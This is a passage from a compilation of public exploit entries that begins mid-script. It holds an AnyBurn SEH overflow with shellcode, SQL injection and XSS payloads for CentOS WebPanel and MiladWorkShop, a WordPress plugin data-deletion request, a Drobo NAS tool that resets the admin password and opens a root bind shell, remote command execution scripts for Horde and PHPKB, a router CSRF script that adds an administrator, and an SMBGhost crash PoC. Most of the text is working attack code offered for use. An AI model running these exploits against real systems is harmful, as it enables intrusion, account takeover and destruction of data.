b"\x4b\x4f\x48\x55\x4f\x4c\x4d\x36\x53\x4c\x4c\x4a\x35" buf += b"\x30\x4b\x4b\x39\x50\x42\x55\x4c\x45\x57\x4b\x4f\x57" buf += b"\x4d\x43\x52\x52\x32\x4f\x42\x4a\x4d\x30\x42\x33\x4b" buf += b"\x4f\x4a\x35\x32\x43\x51\x51\x42\x4c\x52\x43\x4e\x4e" buf += b"\x53\x35\x42\x58\x52\x45\x4d\x30\x41\x41" #Filler padding after payload code to bring us to nseh offset #auto calculated in case payload size changes junk1 = "\x71" * int(nseh_offset-(len(junk)+len(buf))) #SEH Overwrite nSeh = "\x61\x70" #Unicode safe SEH return seh = "\x09\x48" #Stack realignment which takes us directly back into shellcode eax_align = "\x70\x71\x71\x71" eax_align += "\x54" eax_align += "\x47" 
eax_align += "\x58" eax_align += "\x47" eax_align += "\x05\x2F\x11" eax_align += "\x47" eax_align += "\x2d\x01\x11" eax_align += "\x47" eax_align += "\x50" eax_align += "\x47" eax_align += "\xc3" #Padding to take us to 10,000 padding = "\x71" * int(crash_buffer_size-(len(junk)+len(buf)+len(junk1)+len(nSeh)+len(seh)+len(eax_align))) #Assembly of parts buffer=junk+buf+junk1+nSeh+seh+eax_align+padding try: f=open("payload.txt","w") print "\nAnyBurn Version 4.8 (32-bit) Exploit\n" print "Software Link : http://www.anyburn.com/anyburn_setup.exe" print "Exploit Authors: Richard Davy/Gary Nield" print "Tested on: Windows 10 Enterprise x64" print "Vulnerability Type: Buffer Overflow/SEH/Unicode\n" print "Steps to Produce the Exploit:" print "1.- Run python code" print "2.- Open payload.txt and copy content to clipboard" print "3.- Open AnyBurn choose 'Copy disk to image file'" print "4.- Paste the content of payload.txt into the field: 'Select image file name'" print "5.- Click 'Create Now' and you will see a crash and the payload launch.\n" print "[+] Creating %s bytes evil payload " %len(buffer) f.write(buffer) f.close() print "[+] File payload.txt created..." except: print "[!] File cannot be created..."
  15. # Exploit Title: Wordpress Plugin Custom Searchable Data System - Unauthenticated Data modification
# Date: 13 March 2020
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage: https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Software Link: https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Version: 1.7.1

The plugin fails to perform an authorization check before deleting, adding, or editing data entries.

PoC (delete entry):
GET /wordpress/wp-admin/admin.php?page=sds-form-entries&sds-del-entry-first-entry-id=[ENTRY ID1]&sds-del-entry-last-entry-id=[ENTRY ID2]&sds-del-entry-table-row=wp_ghazale_sds_newtest_inputs

Note: the plugin is no longer maintained; either remove it, or add an authorization check to all of its actions.

Special thanks to *Wordfence and Sean Murphy! (https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/)*
  16. # Exploit Title: Centos WebPanel 7 - 'term' SQL Injection # Google Dork: N/A # Date: 2020-03-03 # Exploit Author: Berke YILMAZ # Vendor Homepage: http://centos-webpanel.com/ # Software Link: http://centos-webpanel.com/ # Version: v6 - v7 # Tested on: Kali Linux - Windows 10 # CVE : CVE-2020-10230 # Type: Error Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO # Type: Time Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' OR SLEEP(5)-- JCpP Centos-Webpanel (http://centos-webpanel.com/) CentOS Web Panel | Free Linux Web Hosting Control Panel Free CentOS Linux Web Hosting control panel designed for quick and easy management of (Dedicated & VPS) servers without of need to use ssh console for every little thing
  17. # Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection # Date: 2020-03-12 # Exploit Author: Rick Ramgattie, Ian Sindermann # Vendor Homepage: https://www.drobo.com/ # Version: 4.1.1 and lower. # CVE: CVE-2018-14709, CVE-2018-14701 ### #!/usr/bin/env python3 # nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service. # This utility leverages the lack of any real authentication mechanism to perform arbitrary actions. # These actions include: # - Getting device status. # - Installing applications. # - Resetting admin credentials. # - Popping root shells. # - Turning on party mode. # This set of exploits is known to affect the Drobo 5N2, firmware version 4.1.1 and lower. # As of 2020-03-12, newer firmware versions appear to be vulnerable as well, but this has not been verified. # Most of the Drobo product line also appears to be vulnerable. Again, this has not been verified. # These vulnerabilities were disclosed to the manufacturer on 2018-07-10. # More vulnerabilities for this device may be found here: https://blog.securityevaluators.com/4f1d885df7fc ### # Product of ISE Labs. # - http://www.securityevaluators.com/ # - @ISESecurity ### # RE Notes: # ,-- Encryption bool? # Handshake Preamble: * /\ # 44 52 49 4e 45 54 54 4d 07 01 00 00 00 00 00 88 # \_____________________/ \_________/ \_________/ # Static string. To/from Size of # "DIRNETTM" server? next message # # Handshake # 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 00 00... # \______________________________________________/ \_________/ \_______________________________________________/ \_________________--> # Device serial number with NULL padding. NULL Device serial number with NULL padding. ESAID? 88 bytes of NULL # "dra173202300010" "dra173202300010" # # The stat port returns an "ESAID" value that is identical to the serial number on this device (5N2). 
# One of the serial numbers in this packet may actually be the ESAID. # # Preamble: * # 44 52 49 4e 45 54 54 4d 0a 01 00 00 00 00 00 88 # \_____________________/ \_________/ \_________/ # Static string. To/from Size of # "DIRNETTM" server? next message # # Message: # XX XX XX XX XX XX XX XX 00 # \_____________________/ \/ # Arbitrary length string NULL terminator # # # Protocol flow: # Initial handshake: ,----- 2nd nibble in 3rd section is different. "07 01 00 00" instead of "0a 01 00 00" #TODO: why? # | c -> s: Preamble. <-' \_ # | c -> s: Message: Handshake / `- These two are normally sent as one packet. # v c <- s: Preamble. <-------- 2nd nibble in 3rd section is different. "87 01 00 00" instead of "8a 01 00 00" #TODO: why? # Loop: # +> c -> s: Preamble. # | c -> s: Message: Command. # | c <- s: Preamble. # +- c <- s: Message: Results. > Large responses are split into chunks. Must use size from preamble. import argparse import logging import re import socket import struct import sys LOG_FORMAT = '[%(levelname)s]: %(message)s' BUFFER_SIZE = 1024 HANDSHAKE_PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x07\x01\x00\x00' PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x0a\x01\x00\x00' PREAMBLE_LEN = 16 # Note: Payloads usually contain the device's serial number. Replace this with # '{serial}' so `send_msg` can insert the target's serial. 
PAYLOADS = { "daccess" :'<TMCmd><CmdID>78</CmdID><Params><Name>DroboAccess</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/DroboAccess.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>', "dropbear":'<TMCmd><CmdID>78</CmdID><Params><Name>dropbear</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/dropbear.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>', "getadmin":'<TMCmd><CmdID>30</CmdID><Params><DRINasAdminConfig>DRINasAdminConfig</DRINasAdminConfig><DRINasDroboAppsConfig>DRINasDroboAppsConfig</DRINasDroboAppsConfig></Params><ESAID>{serial}</ESAID></TMCmd>', "getnet" :'<TMCmd><CmdID>30</CmdID><ESAID>{serial}</ESAID><Params><Network>Network</Network></Params></TMCmd>', "gettemp" :'<TMCmd><CmdID>61</CmdID><ESAID>{serial}</ESAID></TMCmd>', "partyon" :'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>900</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>', "partyoff":'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>0</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>', "popit" :'<TMCmd><CmdID>78</CmdID><Params><Name>Drobo`telnetd -l $SHELL -p 8383`Access</Name><Action>Install</Action><Data>bork</Data></Params><ESAID>{serial}</ESAID></TMCmd>', "restart" :'<TMCmd><CmdID>21</CmdID><ESAID>{serial}</ESAID></TMCmd>', "setadmin":'<TMCmd><CmdID>31</CmdID><Params><DRINASConfig><DRINasAdminConfig><UserName>admin</UserName><Password>ono</Password><ValidPassword>1</ValidPassword><EncryptedPassword>0</EncryptedPassword></DRINasAdminConfig><DRINasDroboAppsConfig><Version>11</Version><Enabled>1</Enabled></DRINasDroboAppsConfig></DRINASConfig></Params><ESAID>{serial}</ESAID></TMCmd>', "test" :'<TMCmd><CmdID>82</CmdID><Params><Time>1521161215</Time><GMTOffset>4294966876</GMTOffset></Params><ESAID>{serial}</ESAID></TMCmd>', "stdin" :'Handled elsewhere.'} DEFAULT_PORT_STAT = 5000 DEFAULT_PORT_CMD = 5001 DEFAULT_TIMEOUT = None HELP_EPILOG=''' PAYLOADS daccess - Installs DroboAccess on the target 
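device. At the time of writing, DroboAccess has numerous unauthenticated command injection vulnerabilities. Try the following: GET /DroboAccess/delete_user?username=test';/usr/sbin/telnetd -l /bin/sh -p 8383 - A long delay and response of "<Error>0</Error>" is expected. dropbear - Installs dropbear on the target device. - A response of "<Error>0</Error>" is expected. getadmin - Returns the target's current (redacted) admin configuration. gettemp - Returns the target's system info (temperature and uptime). getnet - Returns the target's network info. partyon - Enables "party mode" on the target. This will cause the target device's lights to blink for 15 minutes. partyoff - Prematurely disables "party mode". popit - Exploits CVE-2019-6801 to spawn a root bind shell on port 8383. - A response of "<Error>1</Error>" is expected. restart - Restarts the target device. setadmin - Sets administrative options on the target. - Username: admin - Password: ono - Apps enabled: yes stdin - Reads data from STDIN and sends it as a command. '''


def _recv_exact(s, n):
    """Return exactly *n* bytes read from socket *s*.

    socket.recv() may return fewer bytes than requested and returns b'' once
    the peer has closed, so a single recv() is never a complete read.

    Raises:
        ConnectionError: the peer closed the connection before *n* bytes
            arrived. (A socket timeout set by the caller surfaces as
            socket.timeout.)
    """
    buf = bytearray()
    while len(buf) < n:
        chunk = s.recv(min(BUFFER_SIZE, n - len(buf)))
        if not chunk:
            raise ConnectionError(
                "connection closed after %d of %d expected bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)


def recv_message(s):
    """Read one NASd frame from *s* and return its body decoded as text.

    A frame is a PREAMBLE_LEN-byte preamble whose last four bytes hold a
    big-endian unsigned body length, followed by the body. The body is read to
    exactly the advertised length (send_message() on our side counts the NUL
    terminator in the length it sends, and the same framing is assumed for the
    device's replies). If the device ever advertises more bytes than it sends,
    this read ends with socket.timeout rather than returning a short body.

    Returns:
        The body as a str with trailing NULs removed; '' for a zero-length body.

    Raises:
        ConnectionError: the peer closed the connection mid-frame.
    """
    preamble = _recv_exact(s, PREAMBLE_LEN)
    msg_len = struct.unpack(">I", preamble[-4:])[0]  # Expected message length from preamble.
    if msg_len == 0:
        return ''
    body = _recv_exact(s, msg_len)
    # Decode once the whole body is in hand, so a multi-byte character split
    # across two recv() chunks cannot raise UnicodeDecodeError.
    return body.decode('utf-8', errors='replace').rstrip('\x00')


def send_handshake(s, serial):
    """Send the NASd command-port handshake frame carrying *serial*.

    Layout of the body: serial (16 bytes, NUL padded), a 4-byte field only ever
    seen as zero, the serial again (16 bytes), then 184 bytes of NUL padding.
    struct "16s" silently truncates a serial longer than 16 bytes.
    """
    serial_bytes = serial.encode('utf-8')
    hs_body = struct.pack("16s", serial_bytes)   # 16 byte padded string containing device serial number.
    hs_body += struct.pack(">I", 0)              # 4 byte field, presumably uint, only seen as zero.
    hs_body += struct.pack("16s", serial_bytes)  # 16 byte padded string containing device serial number. again...
    hs_body += struct.pack("184x")               # 184 bytes of NULL padding.
    size_bytes = struct.pack(">I", len(hs_body))  # Size of message body. Sent after the preamble.
    hs_data = HANDSHAKE_PREAMBLE + size_bytes + hs_body
    logging.debug(repr(hs_data))
    # sendall(): a plain send() may write only part of the frame on a
    # non-trivially sized buffer and the remainder would be silently lost.
    s.sendall(hs_data)


def send_message(s, serial, message):
    """Send one XML command frame on *s*.

    *message* is a str template; ``{serial}`` placeholders are filled with the
    target's serial number before sending. Other ``{``/``}`` characters in a
    payload (e.g. one read from STDIN) must be doubled or str.format() raises.
    The serial comes from the device itself and is inserted without XML
    escaping, which is acceptable for a PoC aimed at that same device.
    """
    msg_body = message.format(serial=serial)  # Add target device's serial number.
    msg_body_bytes = msg_body.encode('utf-8') + b'\x00'  # NULL terminator, counted in the size field.
    size_bytes = struct.pack(">I", len(msg_body_bytes))  # Size of XML body. Sent after the preamble.
    msg_data = PREAMBLE + size_bytes + msg_body_bytes
    logging.debug(repr(msg_data))
    s.sendall(msg_data)


aparser = argparse.ArgumentParser(
    description='nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.',
    epilog=HELP_EPILOG,
    formatter_class=argparse.RawDescriptionHelpFormatter)
aparser.add_argument("host", help='Host or IP address of the target Drobo.')
aparser.add_argument("payload", help='Payload to use. See PAYLOADS.')
aparser.add_argument("-p", "--portstat", help='Specify a non-default stat port on the Drobo.', default=DEFAULT_PORT_STAT, type=int)
aparser.add_argument("-P", "--portcmd", help='Specify a non-default command port on the Drobo.', default=DEFAULT_PORT_CMD, type=int)
aparser.add_argument("-s", "--serial", help='Manually set the target serial number. Skips serial number detection.')
aparser.add_argument("-t", "--timeout", help='Set a timeout in seconds for socket operations.', default=DEFAULT_TIMEOUT, type=float)
aparser.add_argument("-v", "--verbose", help='Increase verbosity.', action='store_true')
args = aparser.parse_args()

# Basic check for color support: ANSI level names only on a TTY on Linux/macOS.
if sys.stdout.isatty() and sys.platform in ["linux", "linux2", "darwin"]:
    logging.addLevelName(logging.NOTSET, "\033[39m????\033[0m")
    logging.addLevelName(logging.DEBUG, "\033[37mDBUG\033[0m")
    logging.addLevelName(logging.INFO, "\033[96mINFO\033[0m")
    logging.addLevelName(logging.WARNING, "\033[93mWARN\033[0m")
    logging.addLevelName(logging.ERROR, "\033[95mERRR\033[0m")
    logging.addLevelName(logging.CRITICAL, "\033[91mCRIT\033[0m")
else:
    logging.addLevelName(logging.NOTSET, "????")
    logging.addLevelName(logging.DEBUG, "DBUG")
    logging.addLevelName(logging.INFO, "INFO")
    logging.addLevelName(logging.WARNING, "WARN")
    logging.addLevelName(logging.ERROR, "ERRR")
    logging.addLevelName(logging.CRITICAL, "CRIT")

logging.basicConfig(format=LOG_FORMAT,
                    level=logging.DEBUG if args.verbose else logging.INFO)

if args.payload == 'stdin':
    logging.info("Reading payload from STDIN.")
    payload_xml = sys.stdin.read()
    logging.debug(payload_xml)
else:
    try:
        payload_xml = PAYLOADS[args.payload]
    except KeyError:
        # Previously an unknown payload name died with a bare KeyError traceback.
        aparser.error("unknown payload %r; see PAYLOADS in --help" % args.payload)

logging.info("Connecting...")
sock_stat = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_stat.settimeout(args.timeout)
sock_cmd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_cmd.settimeout(args.timeout)
try:
    # Connect to the stat port first: it is required for the cmd port to work,
    # and its opening message carries the device serial number.
    sock_stat.connect((args.host, args.portstat))
    sock_cmd.connect((args.host, args.portcmd))

    logging.info("Pulling serial number...")
    # A single recv() is assumed to contain the <mSerial> element -- TODO confirm
    # against a real device; a larger stat message would need a framed read.
    stat_msg = sock_stat.recv(BUFFER_SIZE)
    if args.serial:
        serial = args.serial
    else:
        m = re.search(r'<mSerial>([^<]+)</mSerial>', stat_msg.decode('utf-8', errors='replace'))
        if not m:
            logging.critical("Could not determine target's serial number!")
            logging.debug(stat_msg)
            sys.exit(100)
        serial = m.group(1)
    logging.info("Identified serial: " + serial)
    if len(serial.encode('utf-8')) > 16:
        # send_handshake() packs the serial with struct "16s", which truncates
        # silently; warn so a failed handshake is not a mystery.
        logging.warning("Serial %r exceeds the 16-byte handshake field and will be truncated.", serial)

    # Perform a handshake with the cmd port. Requires the serial num.
    logging.info('Performing handshake...')
    send_handshake(sock_cmd, serial)
    recv_message(sock_cmd)  # Blank response - trash.

    logging.info("Sending payload...")
    send_message(sock_cmd, serial, payload_xml)
    logging.info("Waiting for response...")
    resp = recv_message(sock_cmd)
    logging.info("Response:\n" + resp)
finally:
    # Close both sockets on every path, including sys.exit(100) and timeouts.
    sock_cmd.close()
    sock_stat.close()

logging.info("Donezo.")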
  18. #!/bin/sh if [ "$#" -ne 4 ]; then echo '[!] Usage: <url> <username> <password> <command>' 1>&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$(mktemp)" trap 'rm -f "$JAR"' EXIT echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2 curl -si -c "$JAR" "$BASE/login.php" \ -d 'login_post=1' \ -d "horde_user=$USERNAME" \ -d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \ echo '[!] Cannot log in' 1>&2 echo "[+] Uploading dummy file" 1>&2 echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \ -F 'actionID=11' \ -F 'import_step=1' \ -F 'import_format=csv' \ -F 'notepad_target=x' \ -F 'import_file=@-;filename=x' \ -so /dev/null echo "[+] Running command" 1>&2 BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)" curl -b "$JAR" "$BASE/mnemo/data.php" \ -d 'actionID=3' \ -d 'import_step=2' \ -d 'import_format=csv' \ -d 'header=1' \ -d 'fields=1' \ -d 'sep=x' \ --data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\"
  19. # Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin) # Date: 2020-03-05 # Exploit Author: Miguel Mendez Z. # Vendor Homepage: www.sumavision.com # Software Link: http://www.sumavision.com/ensite/i.php?id=29 # Version: EMR 3.0.4.27 # CVE : CVE-2020-10181 -----------------------Exploit Bash--------------------------- echo "" read -p "Set Hostname: " host read -p "Set username: " user echo "(The password should be between 6 and 32 in length)" read -p "Set password: " pass echo echo "[+] creating user..." sleep 2 postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0") if echo "$postdata" | grep -q "0</html>"; then echo "[+] http://$host/frame_en.asp" echo "[+] created access($user - $pass)" else echo "[-] user not created" fi ------------------------------------------------------ Reference: https://github.com/s1kr10s/Sumavision_EMR3.0/blob/master/exploit_sumavision.sh
# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost

Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48216.zip

## Usage

`./CVE-2020-0796.py servername`

This script connects to the target host and compresses the authentication request with a bad offset field set in the transform header, causing the decompressor to overflow a buffer and crash the target (a denial of service; no code of the attacker's runs).

This contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.

The compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set to 0xFFFFFFFF (4294967295) to trigger the crash.

```python
def _compress(self, b_data, session):
    header = SMB2CompressionTransformHeader()
    header['original_size'] = len(b_data)
    header['offset'] = 4294967295
    header['data'] = smbprotocol.lznt1.compress(b_data)
```

## About

CVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression capabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271). Once a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages.
To do so, the entire SMB packet is compressed and a transform header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16-byte) structure holding a magic value, the uncompressed data size, the compression algorithm used, and an offset value. CVE-2020-0796 is caused by a lack of bounds checking on that offset field, whose value is passed directly to several subroutines. Passing a large value in causes a buffer overflow and crashes the kernel, so this PoC yields a denial of service. With further work, this could be developed into an RCE exploit.
# Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection
# Google Dork: Powered By MiladWorkShop VIP System
# Date: 2020-03-03
# Exploit Author: AYADI Mohamed
# email : [email protected]
# Vendor Homepage: https://miladworkshop.ir/
# Software Link: https://miladworkshop.ir/vip.html
# Version: 1.x
# Tested on: Kali Linux (sqlmap)
# CVE : N/A

[ SQL injection exploitation ]
Address : http://vip.target/forget
Request Type : POST
Injected parameter : lang (POST body)

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lang=en AND 3-4400' OR 6146=6146-- ivGZ21=6 AND 000wM2X=000wM2X

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: lang=en AND 3' AND (SELECT 2915 FROM (SELECT(SLEEP(50)))StCO)-- vkVG21=6 AND 000wM2X=000wM2X

Example (sqlmap). The --data value must be double-quoted, otherwise the shell pairs up the single quotes inside it and strips them before sqlmap sees the payload; the proxy flag is spelled --ignore-proxy:
sqlmap -u "http://vip.target/forget" --data "lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X" --random-agent --banner --ignore-proxy --hex --level 3 --risk 3 --time-sec=6 --timeout 100 --tamper="between.py"

[ XSS exploitation ]
http://vip.target/%22%3E%3Cimg%20src=%22aa%22%20onerror=%22alert(1)%22%3E%3C

# Greetz to all Moroccan cyber security
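# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-03-15
# Exploit Author: Antonio Cannito
# Vendor Homepage: https://www.knowledgebase-script.com/
# Software Link: https://www.knowledgebase-script.com/pricing.php
# Version: Multi-Language v9
# Tested on: Windows 8.1 / PHP 7.4.3
# CVE : CVE-2020-10389

#!/usr/bin/env python3
"""CVE-2020-10389: authenticated RCE in PHPKB Multi-Language 9.

admin/manage-settings.php rewrites admin/include/configuration.php from the
submitted settings form. The "putdown_for_maintenance" value lands inside a
PHP string literal in that file, so a closing quote followed by
`. system("...") .` is written verbatim and runs when the file is next loaded.

WARNING -- destructive side effects on the target:
  * Every setting in the form is overwritten with the author's test values,
    INCLUDING the MySQL server/user/password/database, so the knowledge base
    is left pointing at a dummy database. Capture the live settings page
    first if the target must keep working afterwards.
  * number_login_attempts is set to 2**63-1, which effectively disables the
    login lockout.
Superuser credentials are required.
"""
import argparse
import sys

import requests


def build_settings(maintenance_value):
    """Return the complete manage-settings.php form with the given maintenance flag.

    PHPKB expects every field to be present, so the whole form is replayed with
    the test-install defaults below; only "putdown_for_maintenance" varies
    between the injection request and the cleanup request.

    Args:
        maintenance_value: value for the "putdown_for_maintenance" field; "no"
            for a clean configuration, or "no" followed by the PHP injection.
    """
    return {
        "putdown_for_maintenance": maintenance_value,
        "kbname": "test",
        "kburl": "http://localhost/phpkb",
        "kb_access": "unrestricted",
        "extended_support_license_key": '',
        "mail_server": "default",
        "smtp_hostname": '',
        "smtp_username": '',
        "smtp_password": '',
        "smtp_port": '',
        "encryption_method": "None",
        "emails_debug_mode": "0",
        "emails_debug_output": "error_log",
        "send_mails_from": '',
        "test_email": '',
        # NOTE: these replace the target's real database credentials.
        "mysqlserver": "127.0.0.1",
        "mysqlusername": "root",
        "mysqlpswd": "DummyPass",
        "mysqldatabase": "test",
        "kb_layout": "fluid",
        "category_tree_width": "3",
        "sidebar_orientation": "left",
        "category_tree_layout": "normal",
        "show_tree_articles": "yes",
        "category_articles_count": "show",
        "categories_display_order": "Alphabetic",
        "home_theme": "modern",
        "home_search_layout": "default",
        "categories_layout_theme": "carousel",
        "show_categories_cols": "3",
        "category_title_size": "normal",
        "home_articles_layout": "tabbed",
        "display_featured": "yes",
        "featured_count": "5",
        "display_popular": "yes",
        "popular_count": "5",
        "display_rated": "yes",
        "rated_count": "5",
        "display_recent": "yes",
        "recent_count": "5",
        "enable_subscribe_kb": "yes",
        "kb_subscribe_theme": "minimal",
        "category_articles_layout": "default",
        "category_page_records_default": "10",
        "category_page_records_minimal": "10",
        "articles_sortby": "Popularity",
        "articles_sortorder": "Descending",
        "enable_subscribe_category": "yes",
        "enable_news_page": "yes",
        "display_homepage_news": "yes",
        "number_homepage_news": "5",
        "enable_login_page": "yes",
        "enable_glossary_page": "yes",
        "enable_contact_page": "yes",
        "send_contact_email": "yes",
        "contact_email_address": "[email protected]",
        "enable_instant_suggestions": "yes",
        "minimum_question_characters": "60",
        "default_search": "Articles",
        "search_in_articles": "All",
        "search_in_others": "Both",
        "search_filter": "Any Word",
        "display_recentviewed": "yes",
        "recentviewed_count": "5",
        "display_popular_searches": "yes",
        "popularsearch_count": "5",
        "article_page_theme": "default",
        "article_sidebar_content": "related",
        "enable_add_favorite": "yes",
        "enable_print_article": "yes",
        "enable_email_article": "yes",
        "enable_exportto_msword": "yes",
        "enable_exportto_pdf": "yes",
        "enable_subscribe_article": "yes",
        "enable_custom_fields": "yes",
        "enable_article_rating": "yes",
        "enable_article_hits": "yes",
        "enable_article_author": "yes",
        "show_author_email": "yes",
        "enable_related_articles": "yes",
        "number_related_articles": "10",
        "show_related_articles_randomly": "yes",
        "enable_article_feedback": "yes",
        "enable_article_comments": "yes",
        "existing_comments_visibility": "hide",
        "show_comments_to": "all",
        "comments_sortorder": "Descending",
        "email_privacy_protection": "yes",
        "article_meta_source": "article title",
        "notify_pending_comment_superuser": "yes",
        "notify_approved_comment_user": "yes",
        "schema_publisher_name": '',
        "schema_publisher_logo": '',
        "enable_rss_feed": "yes",
        "enable_rss_featured_feed": "yes",
        "enable_rss_popular_feed": "yes",
        "enable_rss_latest_feed": "yes",
        "enable_rss_rated_feed": "yes",
        "enable_rss_related_feed": "yes",
        # Effectively disables the brute-force lockout on the target.
        "number_login_attempts": "9223372036854775807",
        "login_delay": "5",
        "maxfilesize": "10240",
        "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt",
        "searching_method": "0",
        "fulltext_mode": "0",
        "searchresultsperpage": "10",
        "enable_search_files": "yes",
        "doc_path": "C:\\antiword\\antiword.exe",
        "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe",
        "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe",
        "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe",
        "index_attachment": "yes",
        "enable_autosave": "yes",
        "autosave_interval": "120000",
        "use_wysiwyg_editor": "yes",
        "enable_version_history": "yes",
        "enable_captcha": "yes",
        "captcha_type": "default",
        "recaptcha_site_key": '',
        "recaptcha_secret_key": '',
        "syntax_highlighter_theme": "shThemeDefault",
        "pdf_library": "wkhtmltopdf",
        "wkhtmltopdf_path": "lol",
        "pdf_header": '',
        "pdf_footer_type": "default",
        "pdf_page_numbers": "yes",
        "pdf_page_number_position": "Left",
        "pdf_footer": '',
        "kb_meta_keywords": "keyword1, keyword2, keyword3",
        "kb_meta_desc": "This is demo meta description. You can enter here your meta description.",
        "admin_results_perpage": "10",
        "_selected_tab_": '',
        "submit_hd": "Save",
        "submit_float_btn": '',
    }


def main():
    """Log in, inject the command into configuration.php, trigger it, clean up."""
    parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php")
    parser.add_argument("url", type=str, help="PHPKB's base path")
    parser.add_argument("username", type=str, help="Superuser username")
    parser.add_argument("password", type=str, help="Superuser password")
    parser.add_argument("cmd", type=str, help="The command you want executed")
    args = parser.parse_args()

    with requests.Session() as session:
        # Perform login. No success check is attempted here; a failed login
        # surfaces as an unchanged configuration.php and empty output below.
        session.post(args.url + "/admin/login.php",
                     data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'})

        # Break out of the PHP string literal and concatenate a system() call.
        # A command containing a double quote would end the inner literal early.
        exp = """' . system("{}") . '""".format(args.cmd)
        settings_url = args.url + "/admin/manage-settings.php"
        session.post(settings_url, data=build_settings("no" + exp))

        # Loading the rewritten file executes the injected system() call.
        # (Path fixed: the original omitted the leading '/', producing
        # e.g. "http://hostadmin/include/configuration.php".)
        result = session.get(args.url + "/admin/include/configuration.php")
        # Write the raw bytes so non-UTF-8 command output cannot raise on a
        # Windows console, without printing a bytes repr.
        sys.stdout.buffer.write(result.content)
        sys.stdout.buffer.write(b"\n")
        sys.stdout.flush()

        # Restore a parseable (but still dummy) configuration so the KB loads.
        # The original wrote the literal "no{}" here, leaving a stray "{}".
        session.post(settings_url, data=build_settings("no"))


if __name__ == "__main__":
    main()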
